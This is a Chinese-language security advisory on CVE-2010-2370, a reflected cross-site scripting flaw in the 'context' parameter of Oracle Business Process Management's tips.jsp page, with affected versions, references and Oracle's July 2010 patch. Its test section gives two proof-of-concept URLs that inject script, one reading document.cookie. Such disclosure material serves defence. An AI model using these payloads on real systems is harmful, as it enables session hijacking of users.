安全研究

安全漏洞
Oracle Business Process Management context参数跨站脚本漏洞

发布日期:2010-07-13
更新日期:2010-07-16

受影响系统:
Oracle Business Process Management 6.0.5
Oracle Business Process Management 5.7.3
Oracle Business Process Management 10.3.2
描述:
BUGTRAQ  ID: 41617
CVE ID: CVE-2010-2370

Oracle Business Process Management是全面、集成的业务流程管理套件。

Oracle Business Process Management的Process Administrator组件没有正确地过滤提交给faces/jsf/tips.jsp页面的context参数便返回给了用户,远程攻击者可以通过提交恶意的参数请求执行跨站脚本攻击,在当前用户浏览器会话中执行任意HTML和脚本代码。

<*来源:MarkoT
  
  链接:http://secunia.com/advisories/40605/
        http://www.exploit-db.com/exploits/14369/
        http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html
        http://www.us-cert.gov/cas/techalerts/TA10-194B.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://server:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert(document.cookie)</script>  
http://server:8585/webconsole/faces/faces/faces/jsf/tips.jsp?context=<script>alert('CorelanTeam')</script>

建议:
厂商补丁:

Oracle
------
Oracle已经为此发布了一个安全公告(cpujul2010)以及相应补丁:
cpujul2010:Oracle Critical Patch Update Advisory - July 2010
链接:http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html

浏览次数:3100
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障